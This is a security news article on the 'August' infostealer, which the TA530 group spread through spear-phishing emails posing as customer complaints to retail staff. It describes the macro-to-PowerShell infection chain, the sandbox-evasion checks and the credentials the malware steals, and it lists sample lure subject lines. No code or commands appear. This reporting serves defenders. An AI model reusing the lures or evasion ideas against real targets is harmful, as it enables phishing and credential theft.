Malware

During the month of November 2016, a cyber-crime group has started deploying a new malware family nicknamed "August," used mainly for information gathering and reconnaissance on the infected target's computer.

The crooks have used August in highly-targeted spear-phishing attacks, aimed at the customer service and managerial staff at various retailers, according to US security firm Proofpoint, who first uncovered the attacks and the August malware.

This technique of targeting customer support representatives has also been observed in the past month by security researchers from Trustwave, who reported seeing the Carbanak malware gang using the same method to infect two companies in the hospitality field and a restaurant chain.

Attackers pose as disgruntled customers

According to Proofpoint, behind the August malware stands a long-lived and experienced cyber-crime group tracked by the TA530 codename.

This threat actor has been extremely busy in the past year, targeting high-level execs with very targeted spear-phishing emails, usually put together using data gathered from LinkedIn and other sources.

Now the group has started shipping the August malware, which is nothing more than a mundane infostealer, but a newly created threat.

For their campaign, TA530 has been using spam email disguised as customer complaints. Some of the email subject lines allude to errors in orders, which require customer support reps to investigate the issue, who often end up opening the file attachments they receive with the email. Some of the cleverely-crafted subject lines are:

  • Erroneous charges from [recipient’s domain]
  • [recipient’s domain] - Help: Items vanish from the cart before checkout
  • [recipient’s domain] Support: Products disappear from the cart during checkout
  • Need help with order on [recipient’s domain]
  • Duplicate charges on [recipient’s domain]

A sample of the email customers receive is also embedded below.

Email received by August victims
Email received by August victims [Source: Proofpoint]

In all cases, the attached file is a Word document that contains a malicious macro. Analysis of this file by Proofpoint researchers showed that the macro script, if allowed to execute by the tricked victim, would execute a PowerShell script that downloads and "filelessly" loads the malware into the victim's computer memory, without saving anything on disk.

August employs advanced anti-detection techniques

The August malware, despite being a low-level first-stage infostealer, uses some very advanced anti-detection techniques, some of which were discovered only in the past three months.

The list of anti-detection techniques includes the malware's ability to scan and search for recently opened files, local process counts, task names, and queries for the victim's IP address via the Maxmind IP-to-geolocation API.

The role of these checks is to detect if the malware runs inside a virtual machine or a real computer. If the scans find fewer than three files opened, very few local processes, task names hinting at reverse engineering tools, or IPs associated with well-known data centers, the malware aborts execution, coming to the conclusion that a researcher is trying to analyze it.

August is a top-shelf feature-packed infostealer

If these checks turn out OK, the August infostealer would spring into action, and carry out a series of actions that include:

  • Searching for specific file extensions and uploading the files to its C&C server.
  • Searching and stealing Bitcoin wallet information.
  • Searching and stealing cookies and passwords from browsers such as Firefox and Chrome
  • Searching and stealing passwords from email clients such as Thunderbird and Outlook.
  • Searching and stealing credentials from FTP clients such as SmartFTP, FileZilla, TotalCommander, WinSCP, and CoreFTP.
  • Searching and stealing .rdp (Remote Desktop Protocol) configuration files.
  • Gathering local OS information, such as hardware ID, OS name, and username.

All this data is sent to a remote command and control (C&C) server. This data is accessible to TA530 group members using a Web-based control panel. Proofpoint researcher have managed to gain access to one of these panels, portrayed below.

August malware control panel, file search and exfiltration options
August malware control panel, file search and exfiltration options [Source: Proofpoint]


 

August malware control panel, database with stolen information
August malware control panel, database with stolen information [Source: Proofpoint]

While August is a relatively new threat, the infostealer shows the same grade of sophistication and rich features you see from more mature threats, such as Pony, Snifula, or CoreBot.

Its use of PowerShell for malicious purposes is also in line with a Symantec report released today that discovered that 95.4% of 111 malware families employed Microsoft's PowerShell scripting language for malicious operations, such as downloading other malware, malware modules, or for traversing a network for other precious information.